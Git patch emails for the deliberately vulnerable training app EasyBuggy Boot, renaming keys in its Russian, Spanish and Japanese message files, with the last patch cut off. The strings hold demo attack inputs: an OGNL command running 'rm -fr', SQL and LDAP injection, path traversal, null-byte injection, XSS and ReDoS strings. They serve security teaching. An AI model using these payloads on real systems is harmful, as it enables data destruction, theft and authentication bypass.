title.current.date=Display Current Date -title.current.thread.count=Display Current Thread Count +title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time -title.detect.deadlock=Detect Deadlock -title.endless.waiting.page=Execute Batch -title.guide.download=Download Guides -title.integer.overflow.page=The Distance from Earth to the Moon +title.deadlock.page=Detect Deadlock +title.endlesswaiting.page=Execute Batch +title.nullbyteinjection.page=Download Guides +title.index.page=EasyBuggy Boot +title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators -title.loss.of.trailing.digits.page=Decimal Addition -title.mail.header.injection.page=Question to Administrator -title.heap.memory.usage=Heap Memory Usage -title.nonheap.memory.usage=Non-Heap Memory Usage +title.lossoftrailingdigits.page=Decimal Addition +title.mailheaderinjection.page=Question to Administrator +title.memoryleak.page=Heap Memory Usage +title.memoryleak2.page=Non-Heap Memory Usage title.mojibake.page=Capitalize String -title.ognl.expression.injection.page=Performing Basic Numeric Operations -title.parse.json=Parse JSON -title.response.time=Measure Response Time -title.random.string.generator=Random String Generator -title.round.off.error.page=Easy Subtraction -title.slow.regular.expression.page=Test Regular Expression -title.sql.injection.page=Search Your Secret Number -title.sum.of.natural.numbers=Sum of natural numbers -title.timezone=Display Time Zone Information -title.timezone.list=Lists of Time Zones -title.truncation.error.page=Decimal Division -title.unrestricted.extension.upload=Convert Gray Scale of Image File -title.unrestricted.size.upload=Reverse Color of Image File -title.user.list=User List +title.commandinjection.page=Performing Basic Numeric Operations +title.codeinjection.page=Parse JSON +title.netsocketleak.page=Measure Response Time +title.strplusopr.page=Random String Generator +title.roundofferror.page=Easy Subtraction +title.slowregex.page=Test Regular Expression +title.sqlijc.page=Search Your Secret Number +title.createobjects.page=Sum of natural numbers +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones +title.truncationerror.page=Decimal Division +title.unrestrictedextupload.page=Convert Gray Scale of Image File +title.unrestrictedsizeupload.page=Reverse Color of Image File +title.dbconnectionleak.page=User List title.xss.page=Reverse String -title.xee=Batch Registration of Users -title.xxe=Batch Update of Users +title.xee.page=Batch Registration of Users +title.xxe.page=Batch Update of Users From 462d25598d99f3c5aac3e1e2a68680e751d1f673 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 14:30:37 +0900 Subject: [PATCH 012/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 109 +++++++++++----------- 1 file changed, 55 insertions(+), 54 deletions(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index 3c2fad4..c4aa227 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -205,7 +205,7 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.c.heap.space.leak.occur=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -228,43 +228,43 @@ msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.file.descriptor.leak.occur=File descriptor leak occurs every time you load this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.java.heap.space.leak.occur=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.need.admin.privilege=You need admin privileges to go ahead from here. msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. -msg.note.code.injection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. -msg.note.dead.lock.occur=Deadlock occurs after continuously loading this page few times. -msg.note.enter.count=If you enter a large number, then an endless waiting process occurs. -msg.note.enter.large.number=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.enter.one=Round off error occurs if you enter 1. -msg.note.enter.specific.nembers=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.enter.decimal.value=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.enter.runtime.exec=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. -msg.note.positive.number=Integer overflow occurs if you enter a number greater than or equal to 63. +msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slow.regular.expression=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.slow.string.plus.operation=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.sql.deadlock=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sql.injection=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). -msg.note.mail.header.injection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. -msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. -msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. -msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +msg.note.netsocketleak=Network socket leak occurs every time you load this page. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< @@ -295,16 +295,16 @@ msg.update.records=Updated {0} records. msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. msg.select.upload.file=Select a file to upload. -msg.thread.leak.occur=Thread leak occurs every time you load this page. +msg.note.threadleak=Thread leak occurs every time you load this page. msg.user.not.exist=The user does not exist. msg.user.already.exist=The user already exists. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -section.change.mail=Change Your Mail -section.change.password=Change Your Password -section.client.info=Client Information +title.clickjacking.page=Change Your Mail +title.csrf.page=Change Your Password +title.clientinfo.page=Client Information section.design.test=Design Test -section.server.info=Server Information +title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ style.name.google.mdl=Google Material Design Lite @@ -319,36 +319,37 @@ style.name.monochro=Monochrome style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame style.description.noframe=No header and footer are used. -title.access.history=Access History -title.admins.main.page=Main Page for Administrators +title.filedescriptorleak.page=Access History +title.adminmain.page=Main Page for Administrators title.current.date=Display Current Date -title.current.thread.count=Display Current Thread Count +title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time -title.detect.deadlock=Detect Deadlock -title.endless.waiting.page=Execute Batch -title.guide.download=Download Guides -title.integer.overflow.page=The Distance from Earth to the Moon +title.deadlock.page=Detect Deadlock +title.endlesswaiting.page=Execute Batch +title.nullbyteinjection.page=Download Guides +title.index.page=EasyBuggy Boot +title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators -title.loss.of.trailing.digits.page=Decimal Addition -title.mail.header.injection.page=Question to Administrator -title.heap.memory.usage=Heap Memory Usage -title.nonheap.memory.usage=Non-Heap Memory Usage +title.lossoftrailingdigits.page=Decimal Addition +title.mailheaderinjection.page=Question to Administrator +title.memoryleak.page=Heap Memory Usage +title.memoryleak2.page=Non-Heap Memory Usage title.mojibake.page=Capitalize String -title.ognl.expression.injection.page=Performing Basic Numeric Operations -title.parse.json=Parse JSON -title.response.time=Measure Response Time -title.random.string.generator=Random String Generator -title.round.off.error.page=Easy Subtraction -title.slow.regular.expression.page=Test Regular Expression -title.sql.injection.page=Search Your Secret Number -title.sum.of.natural.numbers=Sum of natural numbers -title.timezone=Display Time Zone Information -title.timezone.list=Lists of Time Zones -title.truncation.error.page=Decimal Division -title.unrestricted.extension.upload=Convert Gray Scale of Image File -title.unrestricted.size.upload=Reverse Color of Image File -title.user.list=User List +title.commandinjection.page=Performing Basic Numeric Operations +title.codeinjection.page=Parse JSON +title.netsocketleak.page=Measure Response Time +title.strplusopr.page=Random String Generator +title.roundofferror.page=Easy Subtraction +title.slowregex.page=Test Regular Expression +title.sqlijc.page=Search Your Secret Number +title.createobjects.page=Sum of natural numbers +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones +title.truncationerror.page=Decimal Division +title.unrestrictedextupload.page=Convert Gray Scale of Image File +title.unrestrictedsizeupload.page=Reverse Color of Image File +title.dbconnectionleak.page=User List title.xss.page=Reverse String -title.xee=Batch Registration of Users -title.xxe=Batch Update of Users +title.xee.page=Batch Registration of Users +title.xxe.page=Batch Update of Users From f8ed2db46716a2f3e60c1c273f0ad8fb14b4bb73 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 14:30:38 +0900 Subject: [PATCH 013/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 109 +++++++++++----------- 1 file changed, 55 insertions(+), 54 deletions(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index 3c2fad4..c4aa227 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -205,7 +205,7 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.c.heap.space.leak.occur=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -228,43 +228,43 @@ msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.file.descriptor.leak.occur=File descriptor leak occurs every time you load this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.java.heap.space.leak.occur=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.need.admin.privilege=You need admin privileges to go ahead from here. msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. -msg.note.code.injection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. -msg.note.dead.lock.occur=Deadlock occurs after continuously loading this page few times. -msg.note.enter.count=If you enter a large number, then an endless waiting process occurs. -msg.note.enter.large.number=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.enter.one=Round off error occurs if you enter 1. -msg.note.enter.specific.nembers=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.enter.decimal.value=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.enter.runtime.exec=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. -msg.note.positive.number=Integer overflow occurs if you enter a number greater than or equal to 63. +msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slow.regular.expression=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.slow.string.plus.operation=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.sql.deadlock=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sql.injection=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). -msg.note.mail.header.injection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. -msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. -msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. -msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +msg.note.netsocketleak=Network socket leak occurs every time you load this page. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< @@ -295,16 +295,16 @@ msg.update.records=Updated {0} records. msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. msg.select.upload.file=Select a file to upload. -msg.thread.leak.occur=Thread leak occurs every time you load this page. +msg.note.threadleak=Thread leak occurs every time you load this page. msg.user.not.exist=The user does not exist. msg.user.already.exist=The user already exists. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -section.change.mail=Change Your Mail -section.change.password=Change Your Password -section.client.info=Client Information +title.clickjacking.page=Change Your Mail +title.csrf.page=Change Your Password +title.clientinfo.page=Client Information section.design.test=Design Test -section.server.info=Server Information +title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ style.name.google.mdl=Google Material Design Lite @@ -319,36 +319,37 @@ style.name.monochro=Monochrome style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame style.description.noframe=No header and footer are used. -title.access.history=Access History -title.admins.main.page=Main Page for Administrators +title.filedescriptorleak.page=Access History +title.adminmain.page=Main Page for Administrators title.current.date=Display Current Date -title.current.thread.count=Display Current Thread Count +title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time -title.detect.deadlock=Detect Deadlock -title.endless.waiting.page=Execute Batch -title.guide.download=Download Guides -title.integer.overflow.page=The Distance from Earth to the Moon +title.deadlock.page=Detect Deadlock +title.endlesswaiting.page=Execute Batch +title.nullbyteinjection.page=Download Guides +title.index.page=EasyBuggy Boot +title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators -title.loss.of.trailing.digits.page=Decimal Addition -title.mail.header.injection.page=Question to Administrator -title.heap.memory.usage=Heap Memory Usage -title.nonheap.memory.usage=Non-Heap Memory Usage +title.lossoftrailingdigits.page=Decimal Addition +title.mailheaderinjection.page=Question to Administrator +title.memoryleak.page=Heap Memory Usage +title.memoryleak2.page=Non-Heap Memory Usage title.mojibake.page=Capitalize String -title.ognl.expression.injection.page=Performing Basic Numeric Operations -title.parse.json=Parse JSON -title.response.time=Measure Response Time -title.random.string.generator=Random String Generator -title.round.off.error.page=Easy Subtraction -title.slow.regular.expression.page=Test Regular Expression -title.sql.injection.page=Search Your Secret Number -title.sum.of.natural.numbers=Sum of natural numbers -title.timezone=Display Time Zone Information -title.timezone.list=Lists of Time Zones -title.truncation.error.page=Decimal Division -title.unrestricted.extension.upload=Convert Gray Scale of Image File -title.unrestricted.size.upload=Reverse Color of Image File -title.user.list=User List +title.commandinjection.page=Performing Basic Numeric Operations +title.codeinjection.page=Parse JSON +title.netsocketleak.page=Measure Response Time +title.strplusopr.page=Random String Generator +title.roundofferror.page=Easy Subtraction +title.slowregex.page=Test Regular Expression +title.sqlijc.page=Search Your Secret Number +title.createobjects.page=Sum of natural numbers +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones +title.truncationerror.page=Decimal Division +title.unrestrictedextupload.page=Convert Gray Scale of Image File +title.unrestrictedsizeupload.page=Reverse Color of Image File +title.dbconnectionleak.page=User List title.xss.page=Reverse String -title.xee=Batch Registration of Users -title.xxe=Batch Update of Users +title.xee.page=Batch Registration of Users +title.xxe.page=Batch Update of Users From b0d2f8c6992ac2c88bb158fbca85f3b794ed9374 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 14:30:40 +0900 Subject: [PATCH 014/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 109 +++++++++++----------- 1 file changed, 55 insertions(+), 54 deletions(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 9164812..7126ec2 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -205,7 +205,7 @@ msg.batch.registration.complete=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b msg.batch.registration.fail=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332\u304c\u5931\u6557\u3057\u307e\u3057\u305f\u3002 msg.batch.update.complete=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0\u304c\u5b8c\u4e86\u3057\u307e\u3057\u305f\u3002 msg.batch.update.fail=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0\u304c\u5931\u6557\u3057\u307e\u3057\u305f\u3002 -msg.c.heap.space.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001C\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002\n\u753b\u9762\u3092\u30ed\u30fc\u30c9\u3057\u7d9a\u3051\u308b\u3068\u3001\u6700\u7d42\u7684\u306bOutOfMemoryError\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=n\u4ee5\u4e0b\u306e\u81ea\u7136\u6570\u3059\u3079\u3066\u306e\u7dcf\u548c (1 + 2 + 3 + \u2026 + n) \u3092\u8a08\u7b97\u3057\u307e\u3059\u3002 msg.cant.create.batch=\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3002 msg.convert.grayscale=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 @@ -228,43 +228,43 @@ msg.enter.id.and.password=\u30e6\u30fc\u30b6\u30fcID\u3068\u30d1\u30b9\u30ef\u30 msg.enter.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.error.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u306a\u3044\u304b\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u4e00\u81f4\u3057\u307e\u305b\u3093\u3002 msg.executed.batch=\u30d0\u30c3\u30c1\u3092\u4f5c\u6210\u3001\u5b9f\u884c\u3057\u307e\u3057\u305f\: -msg.file.descriptor.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u30c7\u30a3\u30b9\u30af\u30ea\u30d7\u30bf\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.info.jvm.not.crash=JVM\u30af\u30e9\u30c3\u30b7\u30e5\u306f\u3001Oracle JDK 6\u307e\u305f\u306f7\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u306b\u306e\u307f\u767a\u751f\u3057\u307e\u3059\u3002 msg.invalid.expression=\u4e0d\u6b63\u306a\u6570\u5f0f\u3067\u3059 \: {0} msg.invalid.json=\u4e0d\u6b63\u306aJSON\u6587\u5b57\u5217\u3067\u3059 \: {0} -msg.java.heap.space.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001Java\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002\n\u753b\u9762\u3092\u30ed\u30fc\u30c9\u3057\u7d9a\u3051\u308b\u3068\u3001\u6700\u7d42\u7684\u306bOutOfMemoryError\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f8\u6841\u306e\u82f1\u6570\u5b57\u3067\u3059\u3002 msg.need.admin.privilege=\u3053\u3053\u304b\u3089\u5148\u306f\u7ba1\u7406\u8005\u6a29\u9650\u304c\u5fc5\u8981\u3067\u3059\u3002 msg.note.brute.force=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30ed\u30b0\u30a4\u30f3\u8a66\u884c\u56de\u6570\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001\u30d6\u30eb\u30fc\u30c8\u30d5\u30a9\u30fc\u30b9\u653b\u6483\u304c\u53ef\u80fd\u3067\u3059\u3002 